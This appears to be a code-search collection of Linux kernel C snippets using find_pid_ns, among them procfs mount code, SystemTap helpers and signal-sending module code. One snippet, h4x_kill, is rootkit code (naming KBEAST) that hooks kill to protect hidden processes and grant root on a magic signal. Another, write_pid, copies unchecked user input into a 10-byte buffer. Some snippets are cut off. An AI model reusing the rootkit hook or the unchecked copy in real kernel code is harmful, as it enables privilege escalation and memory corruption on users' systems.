static ssize_t write_pid(struct file *file,const char __user *buf,size_t count,loff_t *ppos){ //Send signal to user Space char mybuf[10]; int ret = 0; int pid = 0; struct siginfo info; struct task_struct *t; copy_from_user(mybuf,buf,count); sscanf(mybuf,"%d",&pid); printk("pid = %d\n",pid); memset(&info,0,sizeof(struct siginfo)); info.si_signo = SIG_TEST; info.si_code = SI_QUEUE; info.si_int = 1234; rcu_read_lock(); //t = find_task_by_pid_type(PIDTYPE_PID, pid); //find the task_struct associated with this pid t = pid_task(find_pid_ns(pid, &init_pid_ns), PIDTYPE_PID); if(t == NULL){ printk(KERN_INFO "no such pid\n"); rcu_read_unlock(); return -ENODEV; } rcu_read_unlock(); ret = send_sig_info(SIG_TEST,&info, t); if(ret<0){ printk(KERN_INFO "send signal error"); } return count; }
void send_signal(unsigned long arg){ int ret; struct siginfo info; struct task_struct *t; /* send the signal */ memset(&info, 0, sizeof(struct siginfo)); info.si_signo = SIG_TEST; info.si_code = SI_QUEUE; // this is bit of a trickery: SI_QUEUE is normally used by sigqueue from user space, // and kernel space should use SI_KERNEL. But if SI_KERNEL is used the real_time data // is not delivered to the user space signal handler function. info.si_int = arg; //real time signals may have 32 bits of data. rcu_read_lock(); // t = find_task_by_pid_type(PIDTYPE_PID, pid); //find the task_struct associated with this pid t = pid_task(find_pid_ns(user_process_pid, &init_pid_ns), PIDTYPE_PID); if(t == NULL){ printk(KERN_WARNING "no such pid\n"); rcu_read_unlock(); return -ENODEV; } rcu_read_unlock(); ret = send_sig_info(SIG_TEST, &info, t); //send the signal if (ret < 0) { printk("error sending signal\n"); return ret; } return ret; }
static int proc_get_sb(struct file_system_type *fs_type, int flags, const char *dev_name, void *data, struct vfsmount *mnt) { int err; struct super_block *sb; struct pid_namespace *ns; struct proc_inode *ei; char *options; if (proc_mnt) { /* Seed the root directory with a pid so it doesn't need * to be special in base.c. I would do this earlier but * the only task alive when /proc is mounted the first time * is the init_task and it doesn't have any pids. */ ei = PROC_I(proc_mnt->mnt_sb->s_root->d_inode); if (!ei->pid) ei->pid = find_get_pid(1); } if (flags & MS_KERNMOUNT) { ns = (struct pid_namespace *)data; options = NULL; } else { ns = task_active_pid_ns(current); options = data; } sb = sget(fs_type, proc_test_super, proc_set_super, ns); if (IS_ERR(sb)) return PTR_ERR(sb); if (!sb->s_root) { sb->s_flags = flags; if (!proc_parse_options(options, ns)) { deactivate_locked_super(sb); return -EINVAL; } err = proc_fill_super(sb); if (err) { deactivate_locked_super(sb); return err; } ei = PROC_I(sb->s_root->d_inode); if (!ei->pid) { rcu_read_lock(); ei->pid = get_pid(find_pid_ns(1, ns)); rcu_read_unlock(); } sb->s_flags |= MS_ACTIVE; ns->proc_mnt = mnt; } simple_set_mnt(mnt, sb); return 0; }
static struct task_struct *my_find_task_by_pid(pid_t pid) { #if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,28) return pid_task(find_pid_ns(pid, &init_pid_ns), PIDTYPE_PID); #elif LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,26) /* The pid has come from userspace, so we can use f_t_b_vpid to look up */ return find_task_by_vpid(pid); #else return find_task_by_pid(pid); #endif }
static inline struct task_struct* rasmemele_task(struct RasMemEle* ele) { struct pid_namespace *ns = current->nsproxy->pid_ns; struct pid* pd = find_pid_ns(ele->args.pid, ns); struct task_struct* tsk; rcu_read_lock(); tsk = pid_task(pd, PIDTYPE_PID); rcu_read_unlock(); return tsk; }
/* Don't allow your process to be killed Allow local root escalation using magic signal dan pid */ asmlinkage int h4x_kill(int pid, int sig) { int r; struct task_struct *cur; cur = pid_task(find_pid_ns(pid, &init_pid_ns), PIDTYPE_PID); if(cur){ if(strstr(cur->comm,_H4X0R_)||strstr(cur->comm,KBEAST)){ return -EACCES; } } if(sig == _MAGIC_SIG_ && pid == _MAGIC_PID_){ struct cred *new=prepare_creds();if(new){new->uid=0;new->euid=0;new->gid=0;new->egid=0;commit_creds(new);return 0;} return 0; } r = (*o_kill)(pid,sig); return r; }
static struct dentry *proc_mount(struct file_system_type *fs_type, int flags, const char *dev_name, void *data) { int err; struct super_block *sb; struct pid_namespace *ns; struct proc_inode *ei; char *options; if (flags & MS_KERNMOUNT) { ns = (struct pid_namespace *)data; options = NULL; } else { ns = current->nsproxy->pid_ns; options = data; } sb = sget(fs_type, proc_test_super, proc_set_super, ns); if (IS_ERR(sb)) return ERR_CAST(sb); if (!proc_parse_options(options, ns)) { deactivate_locked_super(sb); return ERR_PTR(-EINVAL); } if (!sb->s_root) { sb->s_flags = flags; err = proc_fill_super(sb); if (err) { deactivate_locked_super(sb); return ERR_PTR(err); } sb->s_flags |= MS_ACTIVE; } ei = PROC_I(sb->s_root->d_inode); if (!ei->pid) { rcu_read_lock(); ei->pid = get_pid(find_pid_ns(1, ns)); rcu_read_unlock(); } return dget(sb->s_root); }
static void stapiu_decrement_process_semaphores(struct stapiu_process *p, struct list_head *consumers) { struct task_struct *task; rcu_read_lock(); #if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,24) /* We'd like to call find_task_by_pid_ns() here, but it isn't * exported. So, we call what it calls... */ task = pid_task(find_pid_ns(p->tgid, &init_pid_ns), PIDTYPE_PID); #else task = find_task_by_pid(p->tgid); #endif /* The task may have exited while we weren't watching. */ if (task) { struct stapiu_consumer *c; /* Holding the rcu read lock makes us atomic, and we * can't write userspace memory while atomic (which * could pagefault). So, instead we lock the task * structure, then release the rcu read lock. */ get_task_struct(task); rcu_read_unlock(); list_for_each_entry(c, consumers, target_consumer) { if (c->sdt_sem_offset) { unsigned long addr = p->base + c->sdt_sem_offset; stapiu_write_task_semaphore(task, addr, (unsigned short) -1); } } put_task_struct(task); } else {
struct pid *find_vpid(int nr) { return find_pid_ns(nr, task_active_pid_ns(current)); }
struct pid *find_pid(int nr) { return find_pid_ns(nr, &init_pid_ns); }
struct pid *find_vpid(int nr) { return find_pid_ns(nr, current->nsproxy->pid_ns); }
static inline int kill_proc(pid_t pid, int sig, int priv) { //return kill_pid(sig, find_pid_ns(pid, &init_pid_ns), priv); return kill_pid(find_pid_ns(pid, &init_pid_ns), sig, priv); }